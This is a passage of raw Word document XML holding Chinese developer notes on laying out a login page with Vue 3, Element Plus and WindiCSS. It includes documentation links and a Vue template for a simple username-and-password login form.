        <w:t>布局默认把屏幕分为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个分栏</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785C4DEC" w14:textId="764748FE" w:rsidR="007F2C96" w:rsidRDefault="007F2C96" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43C75920" w14:textId="4BD72449" w:rsidR="00767F6D" w:rsidRPr="00767F6D" w:rsidRDefault="00767F6D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>比如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考这个四列分栏</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A028F41" w14:textId="7F648730" w:rsidR="006A456C" w:rsidRDefault="00866B1E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00866B1E">
        <w:t>https://element-plus.org/zh-CN/component/layout.html#%E5%88%86%E6%A0%8F%E9%97%B4%E9%9A%94</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F2DBC5" w14:textId="77777777" w:rsidR="006A456C" w:rsidRDefault="006A456C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="756F2273" w14:textId="1A324552" w:rsidR="00883B7B" w:rsidRDefault="00883B7B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考控制元素最小高度</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551ECCFA" w14:textId="482671F3" w:rsidR="00883B7B" w:rsidRDefault="00883B7B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00883B7B">
        <w:t>https://cn.windicss.org/utilities/layout/sizing.html#min-height</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC6D424" w14:textId="77777777" w:rsidR="006A456C" w:rsidRDefault="006A456C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FA72119" w14:textId="655179E7" w:rsidR="00657FD2" w:rsidRDefault="00657FD2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>容器，可以自行处理对各大浏览器兼容性问题的显示问题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03140C7F" w14:textId="46BF5175" w:rsidR="00657FD2" w:rsidRDefault="00657FD2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00657FD2">
        <w:t>https://cn.windicss.org/utilities/layout/flexbox.html#flex</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A1FE87" w14:textId="5A8CD26A" w:rsidR="00657FD2" w:rsidRDefault="006B2BC7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上下居中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006B2BC7">
        <w:t>items-center</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>水平居中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006B2BC7">
        <w:t>justify-center</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CAE65E6" w14:textId="09539D1F" w:rsidR="00657FD2" w:rsidRDefault="006B2BC7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>windicss</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> positioning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3357A9DE" w14:textId="77777777" w:rsidR="006B2BC7" w:rsidRDefault="006B2BC7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3987EEC3" w14:textId="77777777" w:rsidR="00657FD2" w:rsidRDefault="00657FD2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13521336" w14:textId="77777777" w:rsidR="00657FD2" w:rsidRDefault="00657FD2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EB7AD5F" w14:textId="08E1D3A7" w:rsidR="00657FD2" w:rsidRDefault="00EF0643" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接下来写右侧，表单的布局，参考</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的表单部分</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308CB936" w14:textId="6F90647C" w:rsidR="00EF0643" w:rsidRDefault="00EF0643" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00EF0643">
        <w:t>https://element-plus.org/zh-CN/component/form.html#%E5%85%B8%E5%9E%8B%E8%A1%A8%E5%8D%95</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7782FC89" w14:textId="77777777" w:rsidR="00657FD2" w:rsidRDefault="00657FD2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="771F0A9A" w14:textId="42A2E909" w:rsidR="00657FD2" w:rsidRDefault="00AB0C67" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关于字体大小的参考：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7704BB02" w14:textId="3E314DF8" w:rsidR="00AB0C67" w:rsidRDefault="00AB0C67" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>windicss</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>排版</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字体大小</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE6B971" w14:textId="43D84D08" w:rsidR="00657FD2" w:rsidRDefault="00AB0C67" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00AB0C67">
        <w:t>https://cn.windicss.org/utilities/general/typography.html#font-size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A651BDD" w14:textId="77777777" w:rsidR="00657FD2" w:rsidRDefault="00657FD2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53EAB1D8" w14:textId="77777777" w:rsidR="00657FD2" w:rsidRDefault="00657FD2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46A829DE" w14:textId="77777777" w:rsidR="00E358DE" w:rsidRPr="00E358DE" w:rsidRDefault="00E358DE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E358DE">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5B0716" w14:textId="77777777" w:rsidR="00E358DE" w:rsidRPr="00E358DE" w:rsidRDefault="00E358DE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E358DE">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;el-row class="min-h-screen bg-blue-400"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2B9DE1" w14:textId="77777777" w:rsidR="00E358DE" w:rsidRPr="00E358DE" w:rsidRDefault="00E358DE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E358DE">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;el-col :span="16" class=" flex items-center justify-center"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23546DC6" w14:textId="77777777" w:rsidR="00E358DE" w:rsidRPr="00E358DE" w:rsidRDefault="00E358DE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E358DE">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7903FEC5" w14:textId="77777777" w:rsidR="00E358DE" w:rsidRPr="00E358DE" w:rsidRDefault="00E358DE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E358DE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                &lt;div class=" font-bold text-5xl text-light-50 mb-4"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00E358DE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>欢迎光临</w:t>
      </w:r>
      <w:r w:rsidRPr="00E358DE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2951D476" w14:textId="77777777" w:rsidR="00E358DE" w:rsidRPr="00E358DE" w:rsidRDefault="00E358DE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E358DE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                &lt;div class="text-gray-200 text-sm"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00E358DE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>此站点是《</w:t>
      </w:r>
      <w:r w:rsidRPr="00E358DE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>vue3 + vite</w:t>
      </w:r>
      <w:r w:rsidRPr="00E358DE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>实战商城后台开发》视频课程的演示地址</w:t>
      </w:r>
      <w:r w:rsidRPr="00E358DE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43508750" w14:textId="77777777" w:rsidR="00E358DE" w:rsidRPr="00E358DE" w:rsidRDefault="00E358DE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E358DE">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0363D6BE" w14:textId="77777777" w:rsidR="00E358DE" w:rsidRPr="00E358DE" w:rsidRDefault="00E358DE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E358DE">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;/el-col&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2831DFDC" w14:textId="77777777" w:rsidR="00E358DE" w:rsidRPr="00E358DE" w:rsidRDefault="00E358DE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C65D48A" w14:textId="77777777" w:rsidR="00E358DE" w:rsidRPr="00E358DE" w:rsidRDefault="00E358DE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E358DE">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;el-col :span="8" class=" bg-light-50 flex items-center justify-center flex-col"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09976EE7" w14:textId="77777777" w:rsidR="00E358DE" w:rsidRPr="00E358DE" w:rsidRDefault="00E358DE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E358DE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;h2 class="font-bold text-3xl text-gray-800" &gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00E358DE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>欢迎回来</w:t>
      </w:r>
      <w:r w:rsidRPr="00E358DE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1186534F" w14:textId="77777777" w:rsidR="00E358DE" w:rsidRPr="00E358DE" w:rsidRDefault="00E358DE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E358DE">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;div class="flex items-center justify-center my-5 text-gray-300 space-x-2"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6936CACC" w14:textId="77777777" w:rsidR="00E358DE" w:rsidRPr="00E358DE" w:rsidRDefault="00E358DE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E358DE">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                &lt;span class="h-[1px] w-16 bg-gray-200"&gt;&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760EF0C9" w14:textId="77777777" w:rsidR="00E358DE" w:rsidRPr="00E358DE" w:rsidRDefault="00E358DE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E358DE">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                &lt;span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363858D0" w14:textId="77777777" w:rsidR="00E358DE" w:rsidRPr="00E358DE" w:rsidRDefault="00E358DE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E358DE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:r w:rsidRPr="00E358DE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>账号密码登录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB3FEE7" w14:textId="77777777" w:rsidR="00E358DE" w:rsidRPr="00E358DE" w:rsidRDefault="00E358DE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E358DE">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                &lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5646A781" w14:textId="77777777" w:rsidR="00E358DE" w:rsidRPr="00E358DE" w:rsidRDefault="00E358DE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E358DE">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                &lt;span class="h-[1px] w-16 bg-gray-200"&gt;&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F94D38E" w14:textId="77777777" w:rsidR="00E358DE" w:rsidRPr="00E358DE" w:rsidRDefault="00E358DE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E358DE">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B84EAAB" w14:textId="77777777" w:rsidR="00E358DE" w:rsidRPr="00E358DE" w:rsidRDefault="00E358DE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E358DE">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;el-form :model="form" class="w-[250px]"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752B742A" w14:textId="77777777" w:rsidR="00E358DE" w:rsidRPr="00E358DE" w:rsidRDefault="00E358DE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E358DE">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                &lt;el-form-item&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F146B7E" w14:textId="77777777" w:rsidR="00E358DE" w:rsidRPr="00E358DE" w:rsidRDefault="00E358DE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E358DE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                    &lt;el-input v-model="form.username" placeholder="</w:t>
      </w:r>
      <w:r w:rsidRPr="00E358DE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>请输入用户名</w:t>
      </w:r>
      <w:r w:rsidRPr="00E358DE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6C7A8A" w14:textId="77777777" w:rsidR="00E358DE" w:rsidRPr="00E358DE" w:rsidRDefault="00E358DE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E358DE">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                &lt;/el-form-item&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A6020E" w14:textId="77777777" w:rsidR="00E358DE" w:rsidRPr="00E358DE" w:rsidRDefault="00E358DE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E358DE">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA9D216" w14:textId="77777777" w:rsidR="00E358DE" w:rsidRPr="00E358DE" w:rsidRDefault="00E358DE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E358DE">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                &lt;el-form-item&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19ED91B4" w14:textId="77777777" w:rsidR="00E358DE" w:rsidRPr="00E358DE" w:rsidRDefault="00E358DE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E358DE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                    &lt;el-input v-model="form.password" placeholder="</w:t>
      </w:r>
      <w:r w:rsidRPr="00E358DE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>请输入密码</w:t>
      </w:r>
      <w:r w:rsidRPr="00E358DE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>" type="password" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49FB55AC" w14:textId="77777777" w:rsidR="00E358DE" w:rsidRPr="00E358DE" w:rsidRDefault="00E358DE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E358DE">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                &lt;/el-form-item&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A127290" w14:textId="77777777" w:rsidR="00E358DE" w:rsidRPr="00E358DE" w:rsidRDefault="00E358DE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40C1D84D" w14:textId="77777777" w:rsidR="00E358DE" w:rsidRPr="00E358DE" w:rsidRDefault="00E358DE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E358DE">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                &lt;el-form-item&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6793E194" w14:textId="77777777" w:rsidR="00E358DE" w:rsidRPr="00E358DE" w:rsidRDefault="00E358DE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E358DE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                    &lt;el-button round class="w-[250px]" type="primary" @click="onSubmit"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00E358DE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>登录</w:t>
      </w:r>
      <w:r w:rsidRPr="00E358DE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;/el-button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F41E247" w14:textId="77777777" w:rsidR="00E358DE" w:rsidRPr="00E358DE" w:rsidRDefault="00E358DE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E358DE">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                &lt;/el-form-item&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D928CC5" w14:textId="77777777" w:rsidR="00E358DE" w:rsidRPr="00E358DE" w:rsidRDefault="00E358DE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E358DE">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;/el-form&gt;</w:t>
      </w:r>
    </w:p>
